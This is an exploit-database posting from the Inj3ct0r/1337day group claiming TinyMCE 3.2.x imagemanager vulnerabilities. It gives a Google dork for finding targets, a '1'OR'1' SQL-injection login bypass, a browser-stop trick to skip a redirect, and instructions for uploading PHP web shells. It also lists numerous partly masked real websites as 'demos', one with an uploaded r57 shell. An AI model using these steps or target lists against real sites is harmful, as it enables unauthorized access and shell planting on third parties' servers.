1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 > Title : TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites > Author : KedAns-Dz + E-mail : ked-h (@hotmail.com / @1337day.com) + FaCeb0ok : fb.me/Inj3ct0rK3d + TwiTter : @kedans # Platform : PHP / WebApp + Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple *************************************************************************/ # TinyMCE v3.2.7 or ..X is suffer from Multiple vuln's / bug :p # Remote Attacker can bypassin auth and upload files , shell's etc... # 1st try with this dork : google dork : allinurl:/plugins/imagemanager/pages/im/index.html # (1) how to bypass auth? => you can bypass auth by simple poc of bypassing like site.tld/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php user & pass : '1'OR'1' =+ demo's : http://www.prodXgy-school.ru/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php user : '1'OR'1' pass : '1'OR'1' http://www.ereX-komarovsky.co.il/admin/login.php user: 1' OR '1'='1 pass: 1' OR '1'='1 && or ( if the simple poc d'nt workin after u access : site.tld/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html ) clic rapidly of the button stop in browser for stop the redirction ;) # (2) Upload Shell/Files .. (.txt .gif) or (.php by use temperData or http header :D ) => poc : site.tld/[path]/plugins/imagemanager/pages/im/index.html and clic in ( upload / add / [+] ) button & upload what you need ;) for ex: shell after up : http://www.prodigy-school.ru/data/r57.txt =+ Demo's: http://www.allemXdemusic.com.hostbaby.com/dashboard/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html http://gesundXit-gt.de/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html http://www.yoXshiredales-stay.co.uk/maintain/tiny_mce/plugins/imagemanager/pages/im/index.html http://www.eXz-komarovsky.co.il/admin/include/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html http://freeXhu/freewbr/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html http://volunteerXmckinney.galaxydigital.com/includes/tiny_mce/plugins/imagemanager/pages/im/index.html http://www.easXtpennsd.org/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.htm http://209.1XX8.74/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html # Take care kid's & 1337day Fan's :D # Ked is Back ^_^ <3 #### #<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !> #<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +> #<+ Copyright &#169; 2013 Inj3ct0r Team | 1337day Exploit Database.+> # ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > * # ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria ** ####